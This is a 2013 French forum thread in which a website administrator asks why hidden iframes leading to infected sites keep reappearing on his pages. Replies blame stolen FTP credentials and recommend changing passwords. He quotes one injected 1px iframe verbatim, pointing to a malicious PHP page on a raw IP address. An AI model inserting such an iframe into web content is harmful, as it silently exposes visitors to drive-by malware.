Forum Clubic

Iframes... qui se rajoutent toutes seules !

Bonjour à tous,

Problème assez gênant pour un site Web que je dois administrer. En effet, je me suis aperçu la semaine passée qu’en me connectant sur le fameux site, un message Google bloque l’accès au site en raison de la présence de liens vérolés. En regardant de plus près, j’ai vu la présence d’une iframe sur la plupart des pages, avec un lien redirigent vers un site infecté.

Je ne suis pas gaga, j’ai pas le souvenir d’avoir mis cette URL foireuse. Le site étant géré par frontpage à l’origine (!!!), je me suis contenté d’explorer manuellement toutes les pages pour nettoyer le code de cette iframe, puis réuploader directement par ftp.

Et aujourd’hui, surprise, je retrouve à nouveau une autre iframe avec une url différente menant vers un site toujours infecté !!

<!-- . --><iframe width="1px" height="1px" src="http://5.45.179.41/transport/replys-terribly-reading_works.php" style="display:block;" ></iframe>

Attention, site Web infecté dans mon lien.

J’avais bien vérifié, le code était bien nettoyé, j’ai même pu me reconnecter sans avoir le message d’avertissement Google. Et aujourd’hui, rebelote.

N’étant pas un spécialiste dans la sécurisation des sites Web, quelqu’un saurait me dire ce qu’il faudrait faire pour que cela ne se reproduise pas ? Comment ce code s’est-il rajouté ? Si je regarde la date de la dernière modif du fichier présent sur le serveur, elle correspond à ma dernière édition.

Merci à vous :wink:
Edité le 19/05/2013 à 21:21

Bon, je viens de tomber sur des articles intéressants, je vais y jeter mes oeilS :

blog.galerie-cesar.com…
forum.ovh.com…

A mon avis, tes identifiant FTP ont été usurpés…(par keylogger ou autre), ca m’est arrivé l’année dernière…
D’une machine saine ou après décontamination de la tienne : Change tes pass (ftp, mysql, NIC) et si tu es chez OVH, tu peux bloquer l’acces aux FTP lorsque tu n’a plus besoin d’y acceder (hebergement>mot de passe).
Edité le 20/05/2013 à 13:57

Oui, c’est vrai que c’est un peu la base, je vais voir ça, merci :slight_smile:

Sinon j’ai un peu fait le ménage sur le site, ai pris en compte certains points dans les liens ci dessus… et ça a l’air d’être bon.

:hello: Apparement, le lien vers OVH est verolé :frowning:

http://uppix.fr/?di=LEFK

Oups :ane::ane:

Surement un exemple dans le forum d’ovh… qui montre un lien vérolé ?

:hello: Non, j’ai cliqué sur ton lien(dans ton post) et NOD32 a bloqué de suite :wink: